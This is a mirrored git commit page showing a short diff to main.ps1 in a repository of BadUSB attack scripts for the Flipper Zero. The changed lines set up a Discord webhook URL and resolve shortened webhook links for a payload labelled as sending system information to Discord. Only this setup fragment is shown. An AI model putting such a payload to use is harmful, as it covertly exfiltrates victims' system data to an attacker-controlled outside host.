mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-29 22:20:36 -08:00
Update main.ps1
This commit is contained in:
@@ -1,4 +1,6 @@
|
||||
$hookurl = "$dc"
|
||||
# SYSTEM INFO TO DISCORD
|
||||
|
||||
$hookurl = "$dc"
|
||||
# shortened URL Detection
|
||||
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}
|
||||
|
||||
|
||||
Reference in New Issue
Block a user